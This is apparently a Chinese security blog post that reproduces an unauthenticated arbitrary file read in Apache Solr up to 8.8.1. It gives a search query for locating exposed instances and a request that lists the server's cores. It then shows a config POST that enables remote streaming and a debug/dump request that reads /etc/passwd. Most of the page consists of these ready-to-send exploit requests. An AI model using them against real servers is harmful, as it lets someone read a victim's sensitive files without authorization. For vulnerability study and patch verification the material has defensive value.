Apache Solr config 任意文件读取漏洞

漏洞描述

Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。

漏洞影响

Apache Solr <= 8.8.1

网络测绘

app=”APACHE-Solr”

漏洞复现

访问 Solr Admin 管理员页面

ad1a1b7183011737

获取core的信息

/solr/admin/cores?indexInfo=false&wt=json

fcd40840bd011825

发送请求

POST /solr/core/config 
Content-Type: application/json

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true},"olrkzv64tv":"="}

再进行文件读取

POST /solr/core/debug/dump?param=ContentStreams 

stream.url=file:///etc/passwd

793ef1c704011926

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容